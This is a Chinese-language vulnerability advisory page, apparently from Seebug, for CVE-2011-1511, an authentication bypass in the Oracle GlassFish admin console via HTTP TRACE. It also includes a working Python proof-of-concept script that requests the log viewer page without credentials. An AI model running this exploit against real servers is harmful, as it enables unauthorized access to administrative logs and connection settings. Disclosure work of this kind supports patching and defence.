Oracle GlassFish Server管理控制台远程验证绕过漏洞

2011-05-1300:00:00

Root

www.seebug.org

0.925 High

EPSS

Percentile

98.7%

JSON

Bugtraq ID: 47818
CVE ID：CVE-2011-1511

Sun GlassFish Enterprise Server是一款构建和部署下一代应用程序和服务的开源和开放社区平台。
管理控制台允许通过HTTP TRACE方法无需验证进行访问，攻击者可以利用此漏洞绕过验证机制获得对某些信息的访问，如日志查看器或JDBC连接池属性信息

Sun Glassfish Enterprise Server 2.1.1
Oracle Glassfish Server 3.0.1
厂商解决方案
Oracle Glassfish Server 3.1已经修复此漏洞，建议用户下载使用：
http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html


                                                #!/usr/bin/env python
import sys
import httplib

def make_trace_request(host, port, selector):

    print '[*] TRACE request: %s' % selector
    headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0)',
                'Host': '%s:%s' % (host, port),
                'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-us,en;q=0.5',
                'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                'Accept-Encoding': 'gzip,deflate',
                'Connection': 'close',
                'Referer': 'http://%s:%s%s' % (host, port, selector)}

    conn = httplib.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    conn.close()

    print response.status, response.reason
    print response.getheaders()
    print response.read()



if len(sys.argv) != 3:
    print &quot;Usage: $ python poc.py &lt;GlassFish_IP&gt;
&lt;GlassFish_Administration_Port&gt;\nE.g:   $ python poc.py 192.168.0.1 4848&quot;
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')

0.925 High

EPSS

Percentile

98.7%

JSON

Related for SSV:20554